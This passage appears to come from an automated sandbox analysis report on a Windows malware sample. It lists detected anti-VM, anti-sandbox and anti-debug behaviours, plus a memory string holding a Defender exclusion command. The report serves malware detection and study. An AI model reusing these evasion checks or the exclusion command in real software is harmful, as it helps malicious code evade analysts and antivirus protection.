Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gzU8odwaPalRTGB.exe PID: 3092, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000000F698E4 second address: 0000000000F698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000000F69B5E second address: 0000000000F69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe TID: 3568	Thread sleep time: -99182s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe TID: 1188	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6320	Thread sleep time: -54000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Thread delayed: delay time: 99182			Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.286465022.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.286069464.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000000.286465022.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000000.265198727.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.286595495.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.286069464.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.278440023.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.286069464.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000006.00000000.286595495.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.286069464.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

5_2_0040ACD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F158EC mov eax, dword ptr fs:[00000030h]	5_2_00F158EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00FAB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAB8D0 mov ecx, dword ptr fs:[00000030h]	5_2_00FAB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00FAB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00FAB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00FAB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00FAB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4F0BF mov ecx, dword ptr fs:[00000030h]	5_2_00F4F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h]	5_2_00F4F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h]	5_2_00F4F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F420A0 mov eax, dword ptr fs:[00000030h]	5_2_00F420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F420A0 mov eax, dword ptr fs:[00000030h]	5_2_00F420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F420A0 mov eax, dword ptr fs:[00000030h]	5_2_00F420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F420A0 mov eax, dword ptr fs:[00000030h]	5_2_00F420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F420A0 mov eax, dword ptr fs:[00000030h]	5_2_00F420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F420A0 mov eax, dword ptr fs:[00000030h]	5_2_00F420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F590AF mov eax, dword ptr fs:[00000030h]	5_2_00F590AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F19080 mov eax, dword ptr fs:[00000030h]	5_2_00F19080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h]	5_2_00F93884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h]	5_2_00F93884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE1074 mov eax, dword ptr fs:[00000030h]	5_2_00FE1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FD2073 mov eax, dword ptr fs:[00000030h]	5_2_00FD2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h]	5_2_00F30050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h]	5_2_00F30050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]	5_2_00F2B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]	5_2_00F2B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]	5_2_00F2B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]	5_2_00F2B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]	5_2_00F4002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]	5_2_00F4002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]	5_2_00F4002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]	5_2_00F4002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]	5_2_00F4002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h]	5_2_00FE4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h]	5_2_00FE4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]	5_2_00F97016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]	5_2_00F97016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]	5_2_00F97016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]	5_2_00F1B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]	5_2_00F1B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]	5_2_00F1B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FA41E8 mov eax, dword ptr fs:[00000030h]	5_2_00FA41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F951BE mov eax, dword ptr fs:[00000030h]	5_2_00F951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F951BE mov eax, dword ptr fs:[00000030h]	5_2_00F951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F951BE mov eax, dword ptr fs:[00000030h]	5_2_00F951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F951BE mov eax, dword ptr fs:[00000030h]	5_2_00F951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h]	5_2_00F461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h]	5_2_00F461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F969A6 mov eax, dword ptr fs:[00000030h]	5_2_00F969A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42990 mov eax, dword ptr fs:[00000030h]	5_2_00F42990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4A185 mov eax, dword ptr fs:[00000030h]	5_2_00F4A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3C182 mov eax, dword ptr fs:[00000030h]	5_2_00F3C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h]	5_2_00F1B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h]	5_2_00F1B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1C962 mov eax, dword ptr fs:[00000030h]	5_2_00F1C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h]	5_2_00F3B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h]	5_2_00F3B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h]	5_2_00F4513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h]	5_2_00F4513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]	5_2_00F34120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]	5_2_00F34120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]	5_2_00F34120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]	5_2_00F34120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F34120 mov ecx, dword ptr fs:[00000030h]	5_2_00F34120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]	5_2_00F19100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]	5_2_00F19100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]	5_2_00F19100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42AE4 mov eax, dword ptr fs:[00000030h]	5_2_00F42AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F42ACB mov eax, dword ptr fs:[00000030h]	5_2_00F42ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]	5_2_00F2AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]	5_2_00F2AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4FAB0 mov eax, dword ptr fs:[00000030h]	5_2_00F4FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]	5_2_00F152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]	5_2_00F152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]	5_2_00F152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]	5_2_00F152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]	5_2_00F152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]	5_2_00F4D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]	5_2_00F4D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F5927A mov eax, dword ptr fs:[00000030h]	5_2_00F5927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]	5_2_00FCB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]	5_2_00FCB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FE8A62 mov eax, dword ptr fs:[00000030h]	5_2_00FE8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FDEA55 mov eax, dword ptr fs:[00000030h]	5_2_00FDEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00FA4257 mov eax, dword ptr fs:[00000030h]	5_2_00FA4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]	5_2_00F19240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]	5_2_00F19240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]	5_2_00F19240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]	5_2_00F19240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F54A2C mov eax, dword ptr fs:[00000030h]	5_2_00F54A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F54A2C mov eax, dword ptr fs:[00000030h]	5_2_00F54A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F15210 mov eax, dword ptr fs:[00000030h]	5_2_00F15210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F15210 mov ecx, dword ptr fs:[00000030h]	5_2_00F15210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F15210 mov eax, dword ptr fs:[00000030h]	5_2_00F15210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F15210 mov eax, dword ptr fs:[00000030h]	5_2_00F15210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]	5_2_00F1AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]	5_2_00F1AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F33A1C mov eax, dword ptr fs:[00000030h]	5_2_00F33A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F28A0A mov eax, dword ptr fs:[00000030h]	5_2_00F28A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]	5_2_00F403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]	5_2_00F403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]	5_2_00F403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]	5_2_00F403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]	5_2_00F403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]	5_2_00F403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F3DBE9 mov eax, dword ptr fs:[00000030h]	5_2_00F3DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]	5_2_00F953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]	5_2_00F953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F44BAD mov eax, dword ptr fs:[00000030h]	5_2_00F44BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F44BAD mov eax, dword ptr fs:[00000030h]	5_2_00F44BAD
